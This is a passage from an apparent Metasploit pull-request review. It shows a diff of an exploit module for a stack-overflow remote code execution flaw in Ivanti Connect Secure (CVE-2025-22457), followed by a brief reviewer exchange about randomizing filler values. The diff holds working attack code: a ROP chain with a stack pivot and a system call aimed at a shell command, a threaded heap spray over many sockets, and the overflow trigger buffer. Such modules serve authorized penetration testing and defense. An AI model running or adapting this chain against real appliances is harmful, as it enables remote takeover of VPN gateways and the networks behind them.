modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb

```diff
@@ -0,0 +1,400 @@
+      SecureRandom.rand(2**32), # 0x39393824:
+
+      libdsplibs_base + @target[:gadget_mov_esp_ebp_pop_ret], # 0x39393828: <--- initial eip control, stack pivot gadget.
+      0x39393828 - 0x10, # 0x3939382C:
+      SecureRandom.rand(2**32), # 0x39393830: <--- points here @ ebp (rop: pop ebp)
+      libdsplibs_base + @target[:gadget_pop_ebx_ret], # 0x39393834:
+
+      libdsplibs_base + @target[:offset_to_got_plt], # 0x39393838: <--- eax (rop pop ebx)
+      libdsplibs_base + @target[:gadget_call_system], # 0x3939383C:
+      SecureRandom.rand(2**32), # 0x39393840:
+      SecureRandom.rand(2**32), # 0x39393844:
+
+      SecureRandom.rand(2**32), # 0x39393848:
+      SecureRandom.rand(2**32), # 0x3939384C:
+      SecureRandom.rand(2**32), # 0x39393850:
+      SecureRandom.rand(2**32), # 0x39393854:
+
+      SecureRandom.rand(2**32), # 0x39393858:
+      0x3939382C, # 0x3939385C: <--- ctx->dword2C (0x39393830+0x2c)
+      SecureRandom.rand(2**32), # 0x39393860:
+      SecureRandom.rand(2**32), # 0x39393864:
+
+      0x39393918, # 0x39393868: <--- ptr to shell_cmd, referenced @ edi
+      SecureRandom.rand(2**32), # 0x3939386C:
+      SecureRandom.rand(2**32), # 0x39393870:
+      SecureRandom.rand(2**32), # 0x39393874:
+
+      SecureRandom.rand(2**32), # 0x39393878:
+      SecureRandom.rand(2**32), # 0x3939387C:
+      SecureRandom.rand(2**32), # 0x39393880:
+      SecureRandom.rand(2**32), # 0x39393884:
+
+      SecureRandom.rand(2**32), # 0x39393888:
+      SecureRandom.rand(2**32), # 0x3939388C:
+      SecureRandom.rand(2**32), # 0x39393890:
+      0x00000000 # 0x39393894: 0x39393830+0x64, this is ctx->max_headers and lets us bail out of the headers loop early.
+
+      # padding...
+      # 0x39393918: shell_cmd @ edi
+    ].pack('V*') + padding + @shell_cmd
+
+    fail_with(Failure::BadConfig, 'spray_pattern should be 512 bytes') unless spray_pattern.length == 512
+
+    heap_buffer = spray_pattern * ((1024 * 1024 * 3) / spray_pattern.length)
+
+    ift_body = [
+      0x00005597, # VENDOR_TCG
+      0x00000001, # IFT_VERSION_REQUEST
+      heap_buffer.length + 16 + 1,
+      0 # seq id
+    ].pack('NNNN') + heap_buffer
+
+    threads = []
+    spray_idx = 0
+
+    0.upto(datastore['MAX_THREADS']) do
+      threads << Rex::ThreadFactory.spawn('IvantiConnectSecureRCE', false) do
+        loop do
+          s = @lock.synchronize do
+            s = @spray_socks[spray_idx]
+            spray_idx += 1
+            s
+          end
+
+          break if s.nil?
+
+          s.write(ift_body)
+        rescue Errno::EMFILE, Errno::ECONNRESET, Errno::EPIPE => e
+          print_error("Error while writing the socket (you might have a too high WEB_CHILDREN value): #{e}")
+        end
+      end
+    end
+
+    threads.each(&:join)
+  end
+
+  def trigger
+    print_status('Triggering...')
+
+    buffer = '1' * @target[:overflow_length]
+
+    buffer += [
+      0x31313131,
+      0x32323232,
+      0x33333333,
+      0x34343434,
+      0x35353535,
```

Comment:
If you want to be extra-fancy, those could be randomized as well

Reply:
Absolutely, addressed in [3d12183](https://github.com/rapid7/metasploit-framework/pull/20112/commits/3d121839c8efe9e0bec1b66ff0ca83a91fa08acd).